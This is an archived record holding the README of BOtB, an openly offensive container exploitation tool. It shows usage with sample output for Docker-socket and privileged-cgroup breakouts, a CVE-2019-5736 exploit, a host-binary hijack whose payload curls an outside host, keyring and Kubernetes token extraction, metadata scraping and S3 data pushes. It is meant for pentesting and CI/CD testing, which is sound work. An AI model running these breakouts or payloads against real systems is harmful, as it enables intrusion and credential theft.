{
	"id": "615952f2-19b1-4145-b085-569f8b2784f3",
	"created_at": "2026-04-06T00:15:59.902241Z",
	"updated_at": "2026-04-10T13:12:44.243295Z",
	"deleted_at": null,
	"sha1_hash": "a3a496af4fb351936fe32bf92badbb11a957c75e",
	"title": "GitHub - brompwnie/botb: A container analysis and exploitation tool for pentesters and engineers.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 137275,
	"plain_text": "GitHub - brompwnie/botb: A container analysis and exploitation\r\ntool for pentesters and engineers.\r\nBy Chris le roy\r\nArchived: 2026-04-05 18:13:46 UTC\r\nBreak out the Box (BOtB)\r\nBOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\r\nWhat does it do?\r\nBOtB is a CLI tool which allows you to:\r\nExploit common container vulnerabilities\r\nPerform common container post exploitation actions\r\nProvide capability when certain tools or binaries are not available in the Container\r\nUse BOtB's capabilities with CI/CD technologies to test container deployments\r\nPerform the above in either a manual or automated approach\r\nCurrent Capabilities\r\nPerform a container breakout via exposed Docker daemons (docker.sock)\r\nPerform a container breakout via CVE-2019-5736\r\nPerform a privileged container breakout via enabled CAPS and SYSCALLS\r\nExtract data from Linux Kernel Keyrings via abusing the Keyctl syscall through permissive seccomp profiles\r\nIdentify Kubernetes Service Accounts secrets and attempt to use them\r\nIdentify metadata services endpoints e.g. http://169.254.169.254, http://metadata.google.internal/ and http://100.100.100.200/\r\nScrape metadata info from GCP metadata endpoints\r\nAnalyze and identify sensitive strings in ENV and in process environments in the ProcFS, i.e. /proc/{pid}/environ\r\nFind and Identify UNIX Domain Sockets\r\nIdentify UNIX domain sockets which support HTTP\r\nFind and identify the Docker Daemon on UNIX domain sockets or on an interface\r\nHijack host binaries with a custom payload\r\nPerform actions in CI/CD mode and only return exit codes \u003e 0\r\nPush data to an S3 bucket\r\nhttps://github.com/brompwnie/botb\r\nPage 1 of 12\n\nForce BOtB to always return an Exit Code of 0 (useful for non-blocking CI/CD)\r\nPerform the above from the CLI arguments or from a YAML config file\r\nPerform reverse DNS lookup\r\nInstallation\r\nBinaries\r\nFor installation instructions from binaries please visit the Releases Page.\r\nVia Go\r\ngo get github.com/brompwnie/botb\r\nBuilding from source\r\nBuilding BOtB via Go:\r\nBuilding BOtB via Make:\r\nUsage\r\nBOtB can be compiled into a binary for the targeted platform and supports the following usage:\r\n./botb-linux-amd64 -h\r\n-aggr string\r\n Attempt to exploit RuncPWN (default \"nil\")\r\n -always-succeed\r\n Always set BOtB's Exit code to Zero\r\n -autopwn\r\n Attempt to autopwn exposed sockets\r\n -cicd\r\n Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0\r\n -config string\r\n Load config from provided yaml file (default \"nil\")\r\n -endpoints string\r\n Provide a textfile with endpoints to use for test (default \"nil\")\r\n -find-docker\r\n Attempt to find Dockerd\r\n -find-http\r\n Hunt for Available UNIX Domain Sockets with HTTP\r\n -find-sockets\r\n Hunt for Available UNIX Domain Sockets\r\n -hijack string\r\n Attempt to hijack binaries on host (default \"nil\")\r\n -k8secrets\r\n Identify and Verify K8's Secrets\r\n -keyMax int\r\n Maximum key id range (default 100000000) and max system value is 999999999 (default 100000000)\r\n -keyMin int\r\n Minimum key id range (default 1) (default 1)\r\n -metadata\r\n Attempt to find metadata services\r\n -path string\r\n Path to Start Scanning for UNIX Domain Sockets (default \"/\")\r\n -pwn-privileged string\r\n Provide a command payload to try exploit --privilege CGROUP release_agent's (default \"nil\")\r\n -pwnKeyctl\r\n Abuse keyctl syscalls and extract data from Linux Kernel keyrings\r\n -recon\r\n Perform Recon of the Container ENV\r\n -region string\r\n Provide a AWS Region e.g eu-west-2 (default \"nil\")\r\n -rev-dns string\r\n Perform reverse DNS lookups on a subnet. Parameter must be in CIDR notation, e.g., -rev-dns 192.168.0.0/\r\n -s3bucket string\r\n Provide a bucket name for S3 Push (default \"nil\")\r\n -s3push string\r\n Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME wou\r\n -scrape-gcp\r\n Attempt to scrape the GCP metadata service\r\n -verbose\r\n Verbose output\r\n -wordlist string\r\n Provide a wordlist (default \"nil\")\r\nBOtB can also be instructed to load settings from a YAML file via the config parameter:\r\n#./botb-linux-amd64 -config=cfg.yml\r\n[+] Break Out The Box\r\n[+] Loading Config: cfg.yml\r\n...\r\nThe following usage examples will return an Exit Code \u003e 0 by default when an anomaly is detected; this is depicted by \"echo $?\", which shows the exit code of the last executed command.\r\nIdentify and Extract Linux Kernel Keyring Secrets that have not been properly protected\r\nMore info from the original author of this technique is available here: https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/\r\n#./botb-linux-amd64 -pwnKeyctl=true -keyMin=0 -keyMax=100000000\r\n[+] Break Out The Box\r\n[*] Attempting to Identify and Extract Keyring Values\r\n[!] WARNING, this can be resource intensive and your pod/container process may be killed, iterate over min and m\r\n[!] Subkey description for key [251133632]: user;0;0;3f010000;brompwnie_secret\r\n[!] Output {\r\n \"KeyId\": 13738777,\r\n \"Valid\": true,\r\n \"Name\": \"_ses.e326b8816c24d0ddda6c2c82ecf62ea2302a7239fce2fd104775d154a97fa3d6\",\r\n \"Type\": \"keyring\",\r\n \"Uid\": \"0\",\r\n \"Gid\": \"0\",\r\n \"Perms\": \"3f1b0000\",\r\n \"String_Content\": \"\\ufffd\\ufffd\\ufffd\\u000e\",\r\n \"Byte_Content\": \"wP73Dg==\",\r\n \"Comments\": null,\r\n \"Subkeys\": [\r\n {\r\n \"KeyId\": 251133632,\r\n \"Valid\": true,\r\n \"Name\": \"brompwnie_secret\",\r\n \"Type\": \"user\",\r\n \"Uid\": \"0\",\r\n \"Gid\": \"0\",\r\n \"Perms\": \"3f010000\",\r\n \"String_Content\": \"thetruthisialsoreallyliketrees\",\r\n \"Byte_Content\": \"dGhldHJ1dGhpc2lhbHNvcmVhbGx5bGlrZXRyZWVz\",\r\n \"Comments\": null,\r\n \"Subkeys\": null,\r\n \"Output\": \"\"\r\n }\r\n ],\r\n \"Output\": \"\"\r\n}\r\n[+] Finished\r\nIdentify and Verify mounted Kubernetes Service Account Secrets\r\n#./botb-linux-amd64 -k8secrets=true\r\n[+] Break Out The Box\r\n[*] Identifying and Verifying K8's Secrets\r\n[!] Token found at: /var/run/secrets/kubernetes.io/serviceaccount/token\r\n[!] Token found at: /run/secrets/kubernetes.io/serviceaccount/token\r\n[*] Trying: https://kubernetes.default/api/v1\r\n[!] Valid response with token (xxxxxxxxxx...)on -\u003e https://kubernetes.default/api/v1\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods\r\n[*] Trying: https://kubernetes.default/api/v1\r\n[!] Valid response with token (xxxxxxxxxx...)on -\u003e https://kubernetes.default/api/v1\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets\r\n[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods\r\n[+] Finished\r\nBreak out from Container via Exposed Docker Daemon\r\nThis approach will break out into an interactive TTY on the host.\r\n#./bob_linux_amd64 -autopwn=true\r\n[+] Break Out The Box\r\n[+] Attempting to autopwn\r\n[+] Hunting Docker Socks\r\n[+] Attempting to autopwn: /var/meh\r\n[+] Attempting to escape to host...\r\n[+] Attempting in TTY Mode\r\n./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh\r\nchroot /host \u0026\u0026 clear\r\necho 'You are now on the underlying host'\r\nYou are now on the underlying host\r\n/ #\r\nBreak out of a Container but in a CI/CD Friendly way\r\nThis approach does not escape into a TTY on the host but instead returns an Exit Code \u003e 0 to indicate a successful container breakout.\r\n#./bob_linux_amd64 -autopwn=true -cicd=true\r\n[+] Break Out The Box\r\n[+] Attempting to autopwn\r\n[+] Hunting Docker Socks\r\n[+] Attempting to autopwn: /var/meh\r\n[+] Attempting to escape to host...\r\n[!] Successfully escaped container\r\n[+] Finished\r\n#echo $?\r\n1\r\nExploit CVE-2019-5736 with a Custom Payload\r\nPlease note that for this exploit to work, a process has to be executed in the target container in this scenario.\r\n#./bob_linux_amd64 -aggr='curl \"https://some.endpoint.com?command=$0\u0026param1=$1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261'\r\n[+] Break Out The Box\r\n[!] WARNING THIS OPTION IS NOT CICD FRIENDLY, THIS WILL PROBABLY BREAK THE CONTAINER RUNTIM\r\n[+] Attempting to exploit CVE-2019-5736 with command: curl \"https://bobendpoint.herokuapp.com/canary/bobby?comm\r\n1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261\r\n[+] This process will exit IF an EXECVE is called in the Container or if the Container is manually stopped\r\n[+] Finished\r\nHijack Commands/Binaries on a Host with a Custom Payload\r\nPlease note that this can be used to test if external entities are executing commands within the container. Examples are docker exec and kubectl cp.\r\n#./bob_linux_amd64 -hijack='curl \"https://bobendpoint.herokuapp.com/canary/bobby?command=$0\u0026param1=$1\u0026param2=$2\"\u003e/dev/null 2\u003e\u00261'\r\n[+] Break Out The Box\r\n[!] WARNING THIS WILL PROBABLY BREAK THE CONTAINER BUT YOU MAY GET SHELLZ...\r\n[+] Attempting to hijack binaries\r\n[*] Command to be used: curl \"https://bobendpoint.herokuapp.com/canary/bobby?command=$0\u0026param1=$1\u0026param2=$2\"\u003e/d\r\n[+] Currently hijacking: /bin\r\n[+] Currently hijacking: /sbin\r\n[+] Currently hijacking: /usr/bin\r\n[+] Finished\r\nFind UNIX Domain Sockets\r\n#./botb-linux-amd64 -find-sockets=true\r\n[+] Break Out The Box\r\n[+] Hunting Down UNIX Domain Sockets from: /\r\n[!] Valid Socket: /var/meh\r\n[+] Finished\r\n#echo $?\r\n1\r\nFind a Docker Daemon\r\n#./bob_linux_amd64 -find-docker=true\r\n[+] Break Out The Box\r\n[+] Looking for Dockerd\r\n[!] Dockerd DOCKER_HOST found: tcp://0.0.0.0:2375\r\n[+] Hunting Docker Socks\r\n[!] Valid Docker Socket: /var/meh\r\n[+] Finished\r\n#echo $?\r\n1\r\nAnalyze ENV and ProcFS Environ for Sensitive Strings\r\nBy default BOtB will search for the two terms \"secret\" and \"password\".\r\n#./bob_linux_amd64 -recon=true\r\n[+] Break Out The Box\r\n[+] Performing Container Recon\r\n[+] Searching /proc/* for data\r\n[!] Sensitive keyword found in: /proc/1/environ -\u003e 'PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bi\r\n[!] Sensitive keyword found in: /proc/12/environ -\u003e 'GOLANG_VERSION=1.12.4HOSTNAME=0e51200113eaGOPATH=/goPWD=/ap\r\n[!] Sensitive keyword found in: /proc/self/environ -\u003e 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpasswordO\r\n[!] Sensitive keyword found in: /proc/thread-self/environ -\u003e 'HOSTNAME=0e51200113eaSHLVL=1HOME=/rootfoo=secretpa\r\n[+] Checking ENV Variables for secrets\r\n[!] Sensitive Keyword found in ENV: foo=secretpassword\r\n[+] Finished\r\n#echo $?\r\n1\r\nA wordlist can be supplied to BOtB to scan for particular keywords.\r\n#cat wordlist.txt\r\nmoo\r\n# ./bob_linux_amd64 -recon=true -wordlist=wordlist.txt\r\n[+] Break Out The Box\r\n[+] Performing Container Recon\r\n[+] Searching /proc/* for data\r\n[*] Loading entries from: wordlist.txt\r\n[+] Checking ENV Variables for secrets\r\n[*] Loading entries from: wordlist.txt\r\n[+] Finished\r\n# echo $?\r\n0\r\nScan for Metadata Endpoints\r\nBOtB by default scans for two Metadata endpoints.\r\n# ./bob_linux_amd64 -metadata=true\r\n[+] Break Out The Box\r\n[*] Attempting to query metadata endpoint: 'http://169.254.169.254/latest/meta-data/'\r\n[*] Attempting to query metadata endpoint: 'http://kubernetes.default.svc/'\r\n[+] Finished\r\n# echo $?\r\n0\r\nBOtB can also be supplied with a list of endpoints to scan for.\r\n# cat endpoints.txt\r\nhttps://heroku.com\r\n# ./bob_linux_amd64 -metadata=true -endpointlist=endpoints.txt\r\n[+] Break Out The Box\r\n[*] Loading entries from: endpoints.txt\r\n[*] Attempting to query metadata endpoint: 'https://heroku.com'\r\n[!] Reponse from 'https://heroku.com' -\u003e 200\r\n[+] Finished\r\n# echo $?\r\n1\r\nScan for UNIX Domain Sockets that respond to HTTP\r\n# ./bob_linux_amd64 -find-http=true\r\n[+] Break Out The Box\r\n[+] Looking for HTTP enabled Sockets\r\n[!] Valid HTTP Socket: /var/run/docker.sock\r\n[+] Finished\r\nScrape data from GCP metadata instance\r\n# ./botb_linux_amd64 -scrape-gcp=true\r\n[+] Break Out The Box\r\n[+] Attempting to connect to: 169.254.169.254:80\r\n[*] Output-\u003e\r\n HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/text\r\nDate: Sun, 30 Jun 2019 21:53:41 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 21013\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n0.1/meta-data/attached-disks/disks/0/deviceName persistent-disk-0\r\n0.1/meta-data/attached-disks/disks/0/index 0\r\n0.1/meta-data/attached-disks/disks/0/mode READ_WRITE\r\n.....\r\nPush data to an AWS S3 Bucket\r\n# ./bob_linux_amd64 -s3push=fileToPush.tar.gz -s3bucket=nameOfS3Bucket -region=eu-west-2\r\n[+] Break Out The Box\r\n[+] Pushing fileToPush.tar.gz -\u003e nameOfS3Bucket\r\n[*] Data uploaded to: https://nameOfS3Bucket.s3.eu-west-2.amazonaws.com/fileToPush.tar.gz\r\n[+] Finished\r\nBreak out of a Privileged Container\r\n# ./bob_linux_amd64 -pwn-privileged=hostname\r\n[+] Break Out The Box\r\n[+] Attempting to exploit CGROUP Privileges\r\n[*] The result of your command can be found in /output\r\n[+] Finished\r\nroot@418fa238e34d:/app# cat /output\r\ndocker-desktop\r\nForce BOtB to always succeed with an Exit Code of 0\r\nThis is useful for non-blocking CI/CD tests.\r\n# ./bob_linux_amd64 -pwn-privileged=hostname -always-succeed=true\r\n[+] Break Out The Box\r\n[+] Attempting to exploit CGROUP Privileges\r\n[*] The result of your command can be found in /output\r\n[+] Finished\r\n# echo $?\r\n0\r\nUsing BOtB with a YAML config file\r\nExample YAML file cfg.yml:\r\npayload: id\r\nverbose: false\r\nalways-succeed: true\r\ncicd: false\r\nendpointlist: endpoints.txt\r\nwordlist: wordlist.txt\r\npath: /\r\nmode: find-sockets\r\nRun BOtB with the above YAML:\r\n# ./bob_linux_amd64 -config=cfg.yml\r\n[+] Break Out The Box\r\n[+] Loading Config: cfg.yml\r\n[+] Looking for UNIX Domain Sockets from: /\r\n[!] Valid Socket: /tmp/thisisnotasocket.mock\r\n[+] Finished\r\nUsing BOtB with CI/CD\r\nBOtB can be used with CI/CD technologies that make use of exit codes to determine if tests have passed or failed. Below is a Shell script that executes two BOtB tests; the exit codes of the two tests are used to set the exit code of the Shell script. If either of the two tests returns an Exit Code \u003e0, the test executing the shell script will fail.\r\n#!/bin/sh\r\n# Run both BOtB tests and remember whether either one returned a non-zero exit code\r\nexitCode=0\r\necho \"[+] Testing UNIX Sockets\"\r\n./bob_linux_amd64 -autopwn -cicd=true || exitCode=1\r\necho \"[+] Testing Env\"\r\n./bob_linux_amd64 -recon=true || exitCode=1\r\nexit $exitCode\r\nThe above script is not the only way to use BOtB with CI/CD technologies: BOtB can also be invoked directly, without a wrapper shell script. An example YML config would be:\r\nversion: 2\r\ncicd:\r\n runATest: ./bob_linux_amd64 -autopwn -cicd=true\r\nBelow is an example config that can be used with Heroku CI:\r\n{\r\n \"environments\": {\r\n \"test\": {\r\n \"scripts\": {\r\n \"test\": \"./bob_linux_amd64 -autopwn -cicd=true\"\r\n }\r\n }\r\n }\r\n}\r\nBelow is an example config with Heroku CI but using a wrapper shell script:\r\n{\r\n \"environments\": {\r\n \"test\": {\r\n \"scripts\": {\r\n \"test\": \"./bin/testSocksAndEnv.sh\"\r\n }\r\n }\r\n }\r\n}\r\nIssues, Bugs and Improvements\r\nFor any bugs, please submit an issue. There is a long list of improvements, but please submit an Issue if there is something you want to see added to BOtB.\r\nReferences and Resources\r\nThis tool would not be possible without the contributions of others in the community; below is a list of resources that have helped me.\r\nhttps://docs.docker.com/engine/security/https/\r\nhttps://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cp\r\nhttps://docs.docker.com/engine/reference/commandline/exec/\r\nhttps://github.com/GoogleContainerTools/container-structure-test\r\nhttps://github.com/coreos/clair\r\nhttps://github.com/aquasecurity/docker-bench\r\nhttps://www.cisecurity.org/benchmark/docker/\r\nhttps://github.com/Frichetten/CVE-2019-5736-PoC\r\nhttps://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/\r\nhttps://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/\r\nhttps://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html\r\nhttps://github.com/wagoodman/dive\r\nhttps://github.com/cji/talks/blob/master/BruCON2018/Outside%20The%20Box%20-%20BruCON%202018.pdf\r\nhttps://github.com/singe/container-breakouts\r\nhttps://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/\r\nhttps://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/\r\nhttps://github.com/antitree/keyctl-unmask#keyctl-unmask\r\nhttps://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/\r\nTalks and Events\r\nBOtB is scheduled to be presented at the following:\r\nBSides London 2019 (https://sched.co/PAwB); slides can be found here: https://github.com/brompwnie/bsideslondon2019\r\nBlackhat Las Vegas Arsenal 2019 (https://www.blackhat.com/us-19/arsenal/schedule/index.html#break-out-the-box-botb-container-analysis-exploitation-and-cicd-tool-14988)\r\nDefCon 27 Cloud Village (https://cloud-village.org/)\r\nBlackhat Europe 2019 (https://www.blackhat.com/eu-19/briefings/schedule/index.html#reverse-engineering-and-exploiting-builds-in-the-cloud-17287)\r\nDevSecCon London 2019 (https://www.devseccon.com/london-2019/)\r\nLicense\r\nBOtB is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).\r\nSource: https://github.com/brompwnie/botb",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/brompwnie/botb"
	],
	"report_names": [
		"botb"
	],
	"threat_actors": [],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.pdf",
		"text": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.txt",
		"img": "https://archive.orkl.eu/a3a496af4fb351936fe32bf92badbb11a957c75e.jpg"
	}
}